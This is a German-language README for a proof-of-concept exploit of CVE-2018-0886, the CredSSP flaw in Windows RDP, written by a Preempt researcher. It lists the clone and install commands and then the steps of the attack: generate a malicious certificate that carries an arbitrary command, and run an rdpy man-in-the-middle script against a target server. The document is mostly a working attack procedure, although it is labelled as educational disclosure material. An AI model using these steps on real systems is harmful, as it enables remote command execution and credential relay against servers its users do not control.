
Ein Code, der CVE-2018-0886 demonstriert.
Dies ist ein PoC-Code zur Ausnutzung von CVE-2018-0886. Er sollte nur zu Bildungszwecken verwendet werden. Er basiert auf einem Fork des rdpy-Projekts (https://github.com/preempt/rdpy), der auch CredSSP-Relay ermöglicht.
Geschrieben von Eyal Karni, Preempt [email protected]
Wenn Sie Ubuntu 14 verwenden, lesen Sie die Installationsdatei. Es wurde auf Ubuntu 16.04 getestet.
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
Exportieren Sie ein für die Serverauthentifizierung geeignetes Zertifikat aus einer beliebigen Domäne. (Es wird für RDP verwendet: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
Um ein Zertifikat zu generieren, das die Schwachstelle ausnutzt (die Nutzlast enthält), verwenden Sie:
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem BEFEHL
(ExportedCert ist das im ersten Schritt exportierte Zertifikat. exploitc.pem und exploitk.pem sind das generierte Zertifikat bzw. der private Schlüssel.)
Um das Angriffsskript auszuführen:
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem ZielServer
Weitere Details finden Sie im Nutzungsbereich der Skripte (--help).